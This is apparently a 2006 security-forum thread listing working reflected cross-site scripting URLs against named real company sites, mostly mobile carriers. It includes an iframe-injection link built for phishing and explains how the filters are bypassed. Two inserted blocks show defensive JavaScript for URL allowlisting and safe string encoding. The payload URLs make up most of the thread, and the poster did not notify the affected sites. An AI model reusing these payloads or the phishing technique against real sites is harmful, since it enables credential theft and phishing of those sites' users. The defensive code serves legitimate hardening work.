This is a pretty good example of jumping out of encapsulation while in a JavaScript function: http://www.microsoft.com/mac/resources/templates.aspx?pid=templates&browser=1&app=&group=&category=&template=%22;alert(%22XSS%22);//
Is it goon-line or go-online? The world may never know: http://goonline.seeq.com/seeq/int_results.jsp?portal_id=1&domain=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&tag=fdsa&keyword=blah
heh, a very phishable find..
and coincidentally, the last javascript string escaping i posted was from their partners in ineptitude http://sla.ckers.org/forum/read.php?3,44,727#msg-727
Same vein... I'm on a roll tonight... so I guess this proves that removing < and > isn't the be-all and end-all: http://www.mtv.com/search/index.jhtml?searchterm=%22);alert(%22XSS%22);//&x=0&y=0
Hmm... actually looks like all their cnames are vulnerable too... You know this is the exact reason I loathe about.com... it tries to be everything to everyone and therefore spam all the search engines. Now everything is vulnerable: http://math.about.com/od/mathjokes/index.htm?terms=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/SCRIPT%3E
again because i was bored.. http://onlinecare.cingular.com/support/knowledgeBase.do?content=%68tt%70%3a%2f/cingular%2ego%2edyndns%2e%6frg/accountverify.html
feel free to login..
This isn't arbitrary XSS, only iframe injection solely from the link: content=http://evil.com .. but it is a good example to show that an injection under /support/ can be quite damaging from phishing - even when just an iframe.
This one is particularly well suited for phishing, since the domain still stays as onlinecare.cingular.com (not so with redirects) .. and the URL is short (long hex encoded strings look suspicious) and the rest of the site is functional and convincing
hopefully, for their sake, they fix it soon - although i'm too lazy to notify them.
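The Cingular case above takes a URL straight from a query parameter and frames it. As an added example (not code from the thread or from any site named in it), this is the kind of server-side check that stops that: the parameter value is parsed as a URL and accepted only when it is http(s), carries no embedded credentials, and resolves to an allowlisted host. The allowlist hosts and every sample input are constructed for the demo.

```javascript
// Hosts the support section is allowed to frame (constructed for this demo).
const ALLOWED_HOSTS = new Set(["support.example.com", "kb.example.com"]);

// Decide whether a decoded "content" parameter may be framed or redirected to.
function isAllowedFrameUrl(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) return false;
  let url;
  try {
    // Resolve against a fixed base so "//other.host/x" and "/local/page" parse
    // predictably instead of throwing or slipping through as "relative".
    url = new URL(raw, "https://support.example.com/");
  } catch (e) {
    return false;
  }
  // Scheme check rejects javascript:, data:, file: and friends.
  if (url.protocol !== "https:" && url.protocol !== "http:") return false;
  // "https://support.example.com@evil.example/" puts the familiar name in the
  // userinfo part; reject anything with credentials rather than reason about it.
  if (url.username || url.password) return false;
  return ALLOWED_HOSTS.has(url.hostname.toLowerCase());
}

// The thread's link hid the scheme and host behind %xx escapes. Query-string
// decoding happens before the URL check, so the decoded host is what is
// compared against the allowlist, not the encoded bytes.
function contentParamAllowed(queryString) {
  const value = new URLSearchParams(queryString).get("content");
  return value !== null && isAllowedFrameUrl(value);
}
```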
here's another good example for injecting inside script tags.. http://www.vodafone.com/site_search_results/0,3062,CATEGORY_ID%253D200%2526LANGUAGE_ID%253D0%2526CONTENT_ID%253D0,00.html?section=all&company=all&KWD=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+&submitButton=%C2%BB
the filter correctly encodes special characters to unusable but displayable forms.. but inside javascript, it escapes double quotations to \" .. which does nothing to prevent you from prematurely ending a string.
However, it also translates } into | .. just to be a pain. and prevents anyone from ending the if(null=null) { blah; | statement. Thus the need for a new set of script tags
http://buscador.telefonica.es/jsp/index.jsp?QUERYSTRING=&NOMLIB=telefonica%7Ctelefonicacom%7Cgrupo_telefonicaonline%7Cgrupo_Telefonicamoviles%7Cgrupo_telefonicadata%7Cgrupo_telefonicamedia%7Cgrupo_cabitel%7Cgrupo_fundaciontelefonica%7Cgrupo_telefonicaid%7Cgrupo_telefonicacable%7Cgrupo_terra%7C&QUERYTYPE=1&QUERYLEVEL=2&DOFRAME=YES&NRESULT=10&PAG=DORESULT&PAGINA=0&FILEINI=&SALADEPRENSA=&IDIOM=&QUERYTXT=a'><script>alert('XSS');</script><b no filters
http://www.orange.com/francais/search/default.asp?qt=maluc%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&ref=form&nh=100&postback=true&col=frhtml no filters .. big french cell phone company, if you're american and don't know them
http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a%22></iframe><script>alert(%22XSS%22)</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes it looks like you first need a session id before this'll work .. (i.e. click the link twice)
no filters.. breaking out of iframe
and i'm exhausted now.. so i'll finish the rest of the top 15 phone companies tomorrow ... http://en.wikipedia.org/wiki/List_of_mobile_network_operators
-maluc
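The Vodafone post above shows why quote-escaping alone is not enough inside a <script> block: the HTML parser finds a "</script>" inside the string before the JavaScript parser ever runs, and per-character substitutions like turning } into | only chase symptoms. As an added example (not code from the thread or from the site), the weak encoder below mirrors quote-only escaping, while the hardened one makes the value inert to the HTML parser by emitting <, >, & and the JS line terminators as \uXXXX escapes. The function names and the sample input are constructed for the demo.

```javascript
// Weak: backslash-escape quotes and backslashes only, as the search page did.
function weakJsString(value) {
  return '"' + String(value).replace(/[\\"]/g, (c) => "\\" + c) + '"';
}

// Hardened: JSON.stringify handles quotes, backslashes and control characters;
// the second pass rewrites every character the HTML parser cares about as a
// \uXXXX escape, which is still a valid JS string escape.
function safeJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Simulates the inline script the page builds from the search keyword.
function renderSearchScript(keyword, encoder) {
  return "<script>var kwd = " + encoder(keyword) + ";</script>";
}

// Defender's check: the rendered markup must contain exactly one closing
// script tag, i.e. the one the template itself wrote.
function scriptBlockIntact(html) {
  return (html.match(/<\/script/gi) || []).length === 1;
}

// Constructed input shaped like the thread's keyword: close the string, close
// the script element, open a new one.
const SAMPLE_KEYWORD = '"; </script><script>x=1;</script><b';
```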
btw RSnake: the link compactor is quite sensitive about unencoded quotations like in: http://www.telecomitalia.com/cgi-bin/tiportale/TIPortale/ep/programView.do?string=a"></iframe><script>alert("XSS")</script><b&Submit=&saveResults=true&saveResults=true&logDebug=true&indexName=TELECOM&lang=ENGLISH&encoding=UTF-8&abstractLength=300&hitsPerSet=10&startSet=1&LANG=EN&tabId=0&pageTypeId=9535&channelId=-8661&programId=27833&programPage=%252Fep%252Fcommon%252FsearchResult.jsp&BV_UseBVCookie=Yes
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.telenor.com.pk/careers/Jobs.php?&CV_ID=XSS%27%3C&password=a<script>alert(String.fromCharCode(88,83,83))</script>&Submit2=++Sign+In++ telenor.com.pk .. a large norwegian mobile service provider that i've never heard of. .com.pk is their pakistan domain though
They filter most of their site.. but let their SQL errors spit back unfiltered input
There may be an SQL injection in a couple places of their site too.. but i fail at sql stuff :/
another cell phone service provider .. .dk = their denmark version
http://se.ext.telia.newjobs.com/login.asp?redirect=h%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cb%20 their job search site.. i don't speak swedish, so not sure if this is a general job site or telia only _-_
http://192.89.232.139/jobs/frmAdSearch.asp?JOBCITY=&JOBUNIT=&JOBTYPE=&JOBFUN=&JOBFUN_SUB=&JOBFUNCTION=&FREE_TEXT=XSS+here%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cb+&JOBSORT=AD_EXT_CDATE&TOP_10=0&L=1 their finnish site, i'm not sure why they don't use a domain name..
http://webbguide.telia.se/redirect.jsp?rid=-1&type=FRONTWEB_INFO_FTG&url=http://nabegr32b.cocolog-nifty.com/wonderfulgr32/images/caterham_seven_csr260.jpg yes i know this is a redirect.. but they were related so i included it here..
-maluc
Edited 3 time(s). Last edit at 09/24/2006 05:54PM by maluc.
singapore cell phone service company .. no filtering - 3 input tags breakout, and 1 textarea breakout
Well my unscientific and non-exhaustive survey found that at least 12 of the biggest 17 (70%) cell phone service companies have XSS holes ripe for phishing.. sad indeed :T
-maluc
Edited 1 time(s). Last edit at 09/24/2006 06:53PM by maluc.